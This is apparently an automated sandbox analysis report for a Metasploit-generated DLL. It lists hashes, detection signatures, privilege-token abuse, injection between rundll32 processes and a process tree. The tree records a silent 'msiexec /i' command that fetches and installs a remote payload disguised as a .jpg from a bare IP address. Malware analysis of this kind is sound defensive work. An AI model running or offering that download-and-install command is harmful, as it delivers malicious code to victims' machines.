metasploit | 12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5

General

Target

12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll
Size

5KB
MD5

d9337ff3c22d2a4258890fd38c5e7d7f
SHA1

6dae55e6a58b612fedb42ebb73a77f9c4b932e27
SHA256

12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5
SHA512

166d9dd0c11cc8d685868e976014938d1abfbb087485324f720b76002e44250309e618622461b6203ea6470dedec62002bea3bda32f4ebf7ef385c78327315ac

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Blocklisted process makes network request 1 IoCs

Processes:

msiexec.exe

flow pid process

3 2016 msiexec.exe
Use of msiexec (install) with remote resource 1 IoCs

Processes:

msiexec.exe

pid process

2028 msiexec.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

rundll32.exe

description pid process target process

PID 616 set thread context of 760 616 rundll32.exe rundll32.exe

flow	pid	process
3	2016	msiexec.exe

pid	process
2028	msiexec.exe

description	pid	process	target process
PID 616 set thread context of 760	616	rundll32.exe	rundll32.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	2028	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2028	msiexec.exe
Token: SeRestorePrivilege	2016	msiexec.exe
Token: SeTakeOwnershipPrivilege	2016	msiexec.exe
Token: SeSecurityPrivilege	2016	msiexec.exe
Token: SeCreateTokenPrivilege	2028	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2028	msiexec.exe
Token: SeLockMemoryPrivilege	2028	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2028	msiexec.exe
Token: SeMachineAccountPrivilege	2028	msiexec.exe
Token: SeTcbPrivilege	2028	msiexec.exe
Token: SeSecurityPrivilege	2028	msiexec.exe
Token: SeTakeOwnershipPrivilege	2028	msiexec.exe
Token: SeLoadDriverPrivilege	2028	msiexec.exe
Token: SeSystemProfilePrivilege	2028	msiexec.exe
Token: SeSystemtimePrivilege	2028	msiexec.exe
Token: SeProfSingleProcessPrivilege	2028	msiexec.exe
Token: SeIncBasePriorityPrivilege	2028	msiexec.exe
Token: SeCreatePagefilePrivilege	2028	msiexec.exe
Token: SeCreatePermanentPrivilege	2028	msiexec.exe
Token: SeBackupPrivilege	2028	msiexec.exe
Token: SeRestorePrivilege	2028	msiexec.exe
Token: SeShutdownPrivilege	2028	msiexec.exe
Token: SeDebugPrivilege	2028	msiexec.exe
Token: SeAuditPrivilege	2028	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2028	msiexec.exe
Token: SeChangeNotifyPrivilege	2028	msiexec.exe
Token: SeRemoteShutdownPrivilege	2028	msiexec.exe
Token: SeUndockPrivilege	2028	msiexec.exe
Token: SeSyncAgentPrivilege	2028	msiexec.exe
Token: SeEnableDelegationPrivilege	2028	msiexec.exe
Token: SeManageVolumePrivilege	2028	msiexec.exe
Token: SeImpersonatePrivilege	2028	msiexec.exe
Token: SeCreateGlobalPrivilege	2028	msiexec.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

rundll32.exerundll32.exerundll32.exe

description	pid	process	target process
PID 1704 wrote to memory of 616	1704	rundll32.exe	rundll32.exe
PID 1704 wrote to memory of 616	1704	rundll32.exe	rundll32.exe
PID 1704 wrote to memory of 616	1704	rundll32.exe	rundll32.exe
PID 1704 wrote to memory of 616	1704	rundll32.exe	rundll32.exe
PID 1704 wrote to memory of 616	1704	rundll32.exe	rundll32.exe
PID 1704 wrote to memory of 616	1704	rundll32.exe	rundll32.exe
PID 1704 wrote to memory of 616	1704	rundll32.exe	rundll32.exe
PID 616 wrote to memory of 760	616	rundll32.exe	rundll32.exe
PID 616 wrote to memory of 760	616	rundll32.exe	rundll32.exe
PID 616 wrote to memory of 760	616	rundll32.exe	rundll32.exe
PID 616 wrote to memory of 760	616	rundll32.exe	rundll32.exe
PID 616 wrote to memory of 760	616	rundll32.exe	rundll32.exe
PID 616 wrote to memory of 760	616	rundll32.exe	rundll32.exe
PID 616 wrote to memory of 760	616	rundll32.exe	rundll32.exe
PID 616 wrote to memory of 760	616	rundll32.exe	rundll32.exe
PID 760 wrote to memory of 2028	760	rundll32.exe	msiexec.exe
PID 760 wrote to memory of 2028	760	rundll32.exe	msiexec.exe
PID 760 wrote to memory of 2028	760	rundll32.exe	msiexec.exe
PID 760 wrote to memory of 2028	760	rundll32.exe	msiexec.exe
PID 760 wrote to memory of 2028	760	rundll32.exe	msiexec.exe
PID 760 wrote to memory of 2028	760	rundll32.exe	msiexec.exe
PID 760 wrote to memory of 2028	760	rundll32.exe	msiexec.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll,#1
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:616

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\SysWOW64\msiexec.exe
msiexec /i http://23.227.200.242:2650/hbYDuh9tfbBfVYg7up.jpg /q
4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2016

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/616-54-0x0000000000000000-mapping.dmp

Download
memory/616-55-0x00000000755B1000-0x00000000755B3000-memory.dmp

Filesize
8KB

Download
memory/760-56-0x000000000048178C-mapping.dmp

Download
memory/2016-60-0x000007FEFBB71000-0x000007FEFBB73000-memory.dmp

Filesize
8KB

Download
memory/2028-58-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing